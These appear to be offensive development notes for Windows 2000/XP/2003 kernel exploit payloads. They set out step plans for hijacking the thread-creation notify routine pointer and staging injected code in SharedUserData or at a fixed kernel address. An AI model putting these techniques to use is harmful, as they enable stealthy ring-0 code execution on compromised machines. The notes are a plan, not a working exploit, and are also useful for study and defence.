Things to try:

hal!KeGetCurrentIrql
806bb354 0fb60524f0dfff   movzx   eax,byte ptr [ffdff024]
806bb35b c3               ret

= Notify routine approach
  - Problems: IRQL restrictions

Sub-approach #1:
  - Find ntoskrnl.exe base
  - Resolve nt!ExAllocatePool
  - Resolve nt!PsSetLoadImageNotifyRoutine
  - Resolve nt!KeLowerIrql
  - Resolve nt!KeRaiseIrql
  - Resolve hal!KeGetCurrentIrql
  - Call ExAllocatePool
  - Copy code to buffer
  - Call KeGetCurrentIrql, save it
  - Call KeLowerIrql
  - Call PsSetLoadImageNotifyRoutine with ptr
  - Call KeRaiseIrql

Sub-approach #2:
  - Find ntoskrnl.exe base
  - Resolve nt!PsSetLoadImageNotifyRoutine
  - Copy code to SharedUserData
  - Call PsSetLoadImageNotifyRoutine with SharedUserData ptr

Sub-approach #3: (good)
  - Find ntoskrnl base
  - Check if win2k by looking at SharedUserData+0x270 (NtMinorVersion, 0 if 2k)
  - Find PsCreateThreadNotifyRoutine (2k) or PsRemoveCreateThreadNotifyRoutine (xp/2k3)
  - Find PspCreateThreadNotifyRoutine
    - win2k,  PsCreateThreadNotifyRoutine+8 = PspCreateThreadNotifyRoutine
    - winxp,  PsRemoveCreateThreadNotifyRoutine+6 = PspCreateThreadNotifyRoutine
    - win2k3, PsRemoveCreateThreadNotifyRoutine+6 = PspCreateThreadNotifyRoutine
  - Copy code to 0xffdffd6c
  - Interlocked exchange PspCreateThreadNotifyRoutine with ptr to code at 0xffdffd6c
  - Try to safe recover thread (exploit dependent)